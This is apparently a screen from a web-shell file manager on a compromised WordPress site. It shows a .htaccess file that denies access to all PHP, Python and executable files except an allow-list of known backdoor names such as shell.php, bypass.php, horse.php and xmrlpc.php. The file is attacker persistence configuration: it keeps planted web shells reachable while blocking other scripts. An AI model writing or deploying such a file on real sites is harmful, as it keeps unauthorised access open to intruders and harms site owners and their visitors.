관리-도구
편집 파일: .htaccess
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> <FilesMatch ".(py|exe|phtml|php|PhP|php5|suspected)$"> Order Allow,Deny Deny from all </FilesMatch> <FilesMatch "(^wp-login.php|^index.php|^wp-blog-header.php|^style2.php|^e.php|^file.php|^mian.php|^blurbs.php|^buy.php|^webdb.php|^mariju.php|^doc.php|^flower.php|^qing2.php|^1index.php|^info2.php|^info.php|^coy.php|^bless.php|^ws.php|^moon.php|^bypass.php|^mysql.php|^mysql2.php||^hg.php|^horse.php|^min.php|^king.php|^sgd.php|^zmFM.php|^xmrlpc.php|^elaina.php|^wp-good.php|^nov.php|^aom.php|^class.api2.php|^ntony.php|^lass.php|^cloud.php|^shell.php|^t2.php|^rest.php|^admin.php|^about.php|^install.php|^png.php)$"> Order allow,deny Allow from all </FilesMatch>